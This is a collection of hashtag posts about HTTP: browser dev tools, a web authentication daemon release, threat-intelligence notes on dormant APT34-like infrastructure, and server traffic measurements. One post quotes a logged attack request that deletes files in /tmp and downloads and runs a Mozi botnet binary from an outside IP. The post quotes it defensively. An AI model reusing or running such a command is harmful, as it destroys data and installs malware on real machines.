
#http


The so-called Developer Tools in the @mozilla Firefox browser are extremely helpful to debug application code and #HTTP errors.

Long-time #Firefox users may have noticed a change in the "Edit and Resend" function. In the past, the request headers could be modified - they are now greyed out.

But with a small configuration change, the old behaviour of "Edit and Resend" can be enabled again. This allows modifying the request headers before re-sending the request.

In our latest #tutorial post we show how.
geekersdigest.com/how-to-modif


Just found out that it is no longer possible to straightforwardly write HTTP/1 requests by hand on the #terminal.

Modern #Apache will reject #HTTP 1.x requests where the line endings are not CRLF, and as far as I know it's not possible on #Linux to type a CR using the keyboard. Ctrl+M should do it in theory, but when I try, it produces LF instead of CR for some reason.

Is there by any chance a way to make the Linux #console (or #KDE #Konsole) produce CRLF when I push the Enter key?

Just released: #swad v0.4

swad is the "Simple Web Authentication Daemon", offering a minimal #http server to do #cookie authentication with some #login form, intended for usage behind a reverse #proxy, designed with #nginx' "auth_request" in mind. It's written in pure #C with minimal dependencies (just OpenSSL/LibreSSL for TLS support and libpam for PAM support).

This release was a quick one, but a new credentials checker module deserves a new release. Now we have "exec" to delegate checking credentials to some external tool.

Read more in the full release notes, grab the .tar.xz and build/install it 😎:
github.com/Zirias/swad/release

New features:

New credential checker "exec", executing some external tool for
checking username/password

Bugfixes:

Don't attempt to close pipes to the PAM helper when it exits, this can
lead to ...

Threat Infrastructure Uncovered Before Activation

Between November 2024 and April 2025, a set of domains and servers impersonating an Iraqi academic organization and fictitious UK tech firms were tracked. The infrastructure, while dormant, exhibited characteristics similar to APT34 (OilRig), including shared SSH keys, structured websites, and decoy HTTP behavior on M247-hosted servers. Key observations include the use of port 8080 for fake 404 responses, consistent SSH fingerprint reuse, and domains registered through P.D.R. Solutions with regway.com nameservers. The setup suggests deliberate pre-operational staging, offering defenders an early warning opportunity. Detection strategies include monitoring SSH fingerprints, HTTP response patterns, and domain registration behaviors.

Pulse ID: 68082a17ee5771aa012e93c3
Pulse Link: otx.alienvault.com/pulse/68082
Pulse Author: AlienVault
Created: 2025-04-22 23:45:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.


From yesterday's httpd log:

/shell?cd+/tmp;rm+-rf+*;wget+http:/45.230.66.30:11302/Mozi.a;chmod+777+Mozi.a;/tmp/Moz...: open failed: file does not exist

There are HTTP servers out there set up stupidly enough to give shell access to anyone who asks‽

It's 2025. Blow any thoughts of Little Bobby Tables! How is shelling out with attacker-supplied data a feature of any HTTP server software? The world has known that rlogin was a bad idea since at least 1991.

Continued thread

How to protect your systems:

1. Check the CrowdSec #CTI feed: Investigate the activity of the “Bold Peachpuff Euphonia” cohort here.

2. Preemptively block infected IPs: Subscribe to curated #HTTP Exploit and CrowdSec Intelligence Blocklists featuring a high rotation rate of malicious IPs and 0% false positives.

3. Deploy behavior-based protection: Deploy the CrowdSec Security Engine to detect evolving threats and take advantage of the built-in behavior-based #WAF. Our decentralized network of Security Engines detected this trend early on. If you're running CrowdSec, you're likely already protected — our Remediation Components actively mitigate these signals in real time.

Sharing insights and taking swift action can collectively reduce the impact of these threats. This is your call to action for real-time threat intelligence and #collaborative #cybersecurity.

For more information, visit crowdsec.net 🧵[4/4]

Continued thread

Another interesting thing is how the malicious HTTP 1.1 traffic which is not being rejected uses either the (human-readable form of the) server's IP address, or the domain name that the DNS maps that IP address to, as the virtual host name.

Of course, the bad actors are doing this just to hit that one rare case where a configuration slip lets those names get at something of some sort.

But they aren't trying any other obvious virtual host names. It seems somewhat half-hearted; so probably hasn't paid off well enough as an attack strategy to have been seriously worked on.

I was supposed, given that the sun shone through a little bit, to drive over to a relative and put together a set of shelves for xem.

Instead, I spent the day improving some logging code in an HTTP 1.1 server, to see how much HTTP 0.9 and 1.0 traffic it is rejecting.

A surprisingly high fraction, it turns out, given what I've read reported about the drop offs in these two since 2010.

Of course, this is being measured on a server where all of the HTTP traffic, except for me on another machine on the LAN, is from bad actors. One can see in the requests that other than are-you-there checks against index.html and favicon.ico the traffic is all exploit attempts against PHP, CGI, and other things.

So I suppose one way of looking at this is that excluding HTTP 0.9 and 1.0 excludes a non-trivial amount of malicious requests.
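
The measurement described in the last two posts, sketched as an added example (not the poster's server or logging code): it labels raw request heads by HTTP version and, for HTTP/1.1, by whether the Host header is an IP literal or a name. The label names and all sample requests are constructed for illustration, using documentation addresses; a request with bare-LF line endings is counted as malformed.

```python
import ipaddress
import re
from collections import Counter

# METHOD SP target [SP HTTP/x.y]; an HTTP/0.9 request line has no version token.
REQUEST_LINE = re.compile(r"([A-Z]+) (\S+)(?: HTTP/(\d\.\d))?")

def is_ip_literal(host: str) -> bool:
    if host.startswith("["):                 # [v6]:port form
        host = host[1:].partition("]")[0]
    elif host.count(":") == 1:               # v4:port or name:port
        host = host.rpartition(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def classify(raw: bytes) -> str:
    lines = raw.decode("latin-1").split("\r\n")   # bare LF is not a line ending
    m = REQUEST_LINE.fullmatch(lines[0])
    if not m:
        return "malformed"
    version = m.group(3)
    if version is None:
        return "http/0.9"
    if version != "1.1":
        return "http/1.0" if version == "1.0" else "malformed"
    for line in lines[1:]:
        if not line:                         # empty line ends the header block
            break
        name, _, value = line.partition(":")
        if name.lower() == "host":
            kind = "ip-host" if is_ip_literal(value.strip()) else "name-host"
            return "http/1.1:" + kind
    return "http/1.1:no-host"

def tally(requests) -> Counter:
    return Counter(classify(r) for r in requests)

# Constructed sample traffic (documentation addresses and names only).
SAMPLES = [
    b"GET /index.html\r\n",
    b"GET /favicon.ico HTTP/1.0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: [2001:db8::1]:8080\r\n\r\n",
    b"POST /index.php HTTP/1.1\r\nHost: www.example.org\r\n\r\n",
    b"GET / HTTP/1.1\nHost: www.example.org\n\n",
]
```

Calling `tally(SAMPLES)` gives the per-label counts; on real traffic the ratio of `http/0.9` and `http/1.0` to the rest is the rejected fraction the post refers to.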